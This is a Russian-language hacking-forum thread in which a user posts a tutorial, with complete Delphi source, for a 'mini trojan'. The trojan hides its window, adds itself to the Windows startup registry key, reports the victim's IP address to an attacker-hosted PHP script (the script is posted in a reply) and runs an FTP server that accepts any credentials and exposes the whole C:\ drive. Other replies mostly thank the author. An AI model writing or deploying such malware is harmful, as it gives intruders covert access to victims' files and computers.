1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Плучения доступа к тиску C:\ (мини троян)

Тема в разделе "Программирование", создана пользователем Xaker26, 3 янв 2013.

  1. TopicStarter Overlay
    Xaker26

    Xaker26 Гость

    Доброе время суток!
    Вот решил написать для Вас статью по кодингу на Delphi7. Сегодня мы разберём как можно на Delphi7 написать свой мини троян который нам предоставит полный доступ к диску C:\ у жертвы. Сразу хочу обнадёжить тех кто ищет статьи копипаста я этим не занимаюсь у меня все статьи оригинальные не когда не копипастил и не буду да я и сам не уважаю людей тех кто, что то копипастит и после вылаживает. Все мои статьи оригинальны. В общем хватит разглагольствовать и займёмся делом.

    Что нам надо?
    1.Сама среда Delphi7. Please login or register to view links
    2.Не много мозга.
    3.И хотябы одна рука.
    4.Сам скрипт bas.php куда будет делать запрос наш трой создавая файл bas с IP адресом жертвы.

    С чем в этой статье познакомимся?
    1.Скрытия формы.
    2.Пропись в автозагрузку
    3.Програмно определения IP адреса.
    4.Получения доступа к диску C:\

    Для начала скачаем саму среду Delphi7 и установим её так же установим дополнительные компоненты из пакета VC32.

    Установка пакета компонентов VC32:
    1.Запускаем среду Delphi7
    2.Кидаем сам пакет компонентов в директорию C:\Program Files\Delphi7\Projects\Bpl
    3.Запускаем из папки VC32 файл ICSDEL30.DPK после нажимаем на закладку которые находятся в верху у Delphi7 Tools - Library - Library path после выбираем папку с названием VC32 нажав на точечную кнопочку и клацаем на кнопку Add после Ок. Потом когда мы запустили ICSDEL30.DPK у нас появилась окошко там нажимаем Install и после Compile. У нас должно появится окошко какие компоненты у нас устанавливаются если всё прошло успешно нажимаем Ок и всё у Вас после этого должна в Delphi появится новая вкладка на панели компонентов под названием FPiette.

    Скрытия формы:
    Запускаем среду Delphi7 и создаём у Form1 (у нашей формы) обработчик событий OnCreate в Object Inspector-е перейдя на вкладку Events и два раза щёлкнув мышкой на OnCreate. У нас должна создастся процедура:

    Код:
    procedure TForm1.FormCreate(Sender: TObject);
    begin
     
    end;
     
    end.
    
    после begin прописываем следующий код:

    Код:
    Application.Showmainform:=false;
    Теперь давайте рассмотрим, что мы сказали нашей форме, а мы сказали, что наша форма принадлежит лжи (false) тем самым мы скрыли её запуск.


    Пропись в автозагрузку:

    В uses в верху добавляем слова registry тем самым мы говорим среде, что будем работать с реестром.
    Ниже рассмотрим код:

    Код:
    procedure TForm1.FormCreate(Sender: TObject);[
    var
    Registry:TRegistry; //объявляем переменную Registry как TRegistry
    begin
    Application.Showmainform:=false; //скрываем форму
     
    Registry := TRegistry.Create; //говорим, что мы будем создавать ветку реестра
    Registry.RootKey := HKEY_CURRENT_USER; //здесь мы говорим что мы создаём её в ветке HKEY_CURRENT_USER
    Registry.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',true); //открываем нашу ветку RUN для записи нашего трояна.
    Registry.WriteString('Troyn', Application.ExeName); //создаём ветку с названием Troyn
    Registry.CloseKey; //закрываем
    Registry.Free;
     
    end;
    
    Определения IP адреса:
    IP адрес мы будем отправлять на GET и здесь очень много можно придумать методов отправки IP адреса через компонент WebBrowser1 либо через компонент idHTTP1 либо вообще мы можем написать функию на WinInet которая нам и будет присылать IP адрес точнее делать GET запрос на наш скрипт. Но т.к это самый первый урок для Вас начнём с самого лёгкого с компонента WebBrowser1. Находим на панели компонентов вкладку Internet и находим там компонент с название WebBrowser1 и кидаем его на форму после пишем следующие:

    Код:
    WebBrowser1.Navigate('http://ВАШ САЙТ/bas.php');
    тем самым мы сказали компоненту WebBrowser1, что мы заходим на ссылку Please login or register to view links САЙТ/bas.php через него. Не забудьте залить на хостинг скрипт bas.php. При переходе на данный скрипт должен создаваться файлик с названием bas где и будет содержатся IP адрес жертвы, дата и время когда этот IP пришел.

    Получения доступа к диску C:\
    Кидаем на форму компонент FtpServer1 с нашей новой вкладке FPiette, после в самый верх прописываем в uses FTPSRVC и пишем следующий код:

    Код:
    FtpServer1.Start;
    после у компонента FtpServer1 создаём обработчик событий OnAuthenticate в Project Inspector-е во вкладке Events и после begin пишем следующий код:



    Код:
    procedure TForm1.FtpServer1Authenticate(Sender: TObject;
    Client: TFtpCtrlSocket; UserName, Password: TFtpString;
    var Authenticated: Boolean);
    begin
    Authenticated:=true;
    client.HomeDir:='C:\'; //получаем доступ к диску C:\
    end;
     
    end.
    Весь код:

    Код:
    unit Unit1;
     
    interface
     
    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, registry, OleCtrls, SHDocVw, FtpSrv, ScktComp, FTPSRVC;
     
    type
    TForm1 = class(TForm)
    WebBrowser1: TWebBrowser;
    FtpServer1: TFtpServer;
    procedure FormCreate(Sender: TObject);
    procedure FtpServer1Authenticate(Sender: TObject;
    Client: TFtpCtrlSocket; UserName, Password: TFtpString;
    var Authenticated: Boolean);
    private
    { Private declarations }
    public
    { Public declarations }
    end;
     
    var
    Form1: TForm1;
     
    implementation
     
    {$R *.dfm}
     
    procedure TForm1.FormCreate(Sender: TObject);
    var
    Registry: TRegistry; //объявляем переменную чтоб работать с реестром
    begin
    Application.Showmainform:=false; //скрываем форму
     
    Registry := TRegistry.Create; //создаём ветку реестра
    Registry.RootKey := HKEY_CURRENT_USER; //создаём её в HKEY_CURRENT_USER
    Registry.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',true); //открываем ветку RUN для записи
    Registry.WriteString('Troyn', Application.ExeName); //записываемся в реестр как Troyn
    Registry.CloseKey; //закрываем ветку реестра
    Registry.Free;
     
    WebBrowser1.Navigate('http://НАШ САЙТ/bas.php'); //заходим на наш get тем самым записывая наш IP
     
    FtpServer1.Start; //запускаем наш сервер
     
    end;
     
    procedure TForm1.FtpServer1Authenticate(Sender: TObject;
    Client: TFtpCtrlSocket; UserName, Password: TFtpString;
    var Authenticated: Boolean);
    begin
    Authenticated:=true;
    client.HomeDir:='C:\'; //говорим, что хотим получить доступ к диску C:\
    end;
     
    end.
    исходник + пакет компонентов VC32 Please login or register to view links


    В качестве безопасности в видео уроке я не стал открывать файл bas чтоб не светить свой IP.

    Заход на ПК жертвы осуществляется так ftp:\\ip жертвы


    Автор:Xaker26
     
    • Like Like x 7
    Метки:
  2. TopicStarter Overlay
    }{OTT@BY4

    }{OTT@BY4 Гость

    Красавчик Руся:)
     
  3. TopicStarter Overlay
    Ltybcrf

    Ltybcrf Гость

    надеемся будут ещё уроки )
     
  4. SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    А какой код у bas.php скрипта ,чет я его в статье не увидел .....:( Или код в нете искать .
     
  5. TopicStarter Overlay
    Xaker26

    Xaker26 Гость

    А скачать лень Please login or register to view links

    PHP:
    <?php
    $file
    =bas;
    $base=$_GET['bas'];
    $data=date("d.m.Y");
    $time=date("h:i");
    $ip=trim($_SERVER['REMOTE_ADDR']);
     
    $fo=fopen($file,"a");
    $res="|Дата:$data|Время:$time|IP:$ip|$base| \n";
    $fw=fwrite($fo,$res);
    fclose($fo);
    ?>
     
    • Like Like x 1
  6. SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Чесно не лень я думал это сама программа Делфи ,а она у меня уже установлена :rolleyes: А там у тебя походу исходник.Спасибо за скрипт.Надо попробовать на досуге...;)
     
  7. max46

    max46

    Регистрация:
    18 окт 2012
    Сообщения:
    123
    Симпатии:
    26
    Спасибо,доступно и понятно!
     
    • Like Like x 1
  8. TopicStarter Overlay
    Xaker26

    Xaker26 Гость

    Не за что, как время выберу ещё статейку напишу по кодингу.
     
    • Like Like x 2
  9. SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Будем ждать.
     
  10. TopicStarter Overlay
    virusik85(old)

    virusik85(old) Гость

    к тиску C:)
     
    • Like Like x 1

Поделиться этой страницей

Загрузка...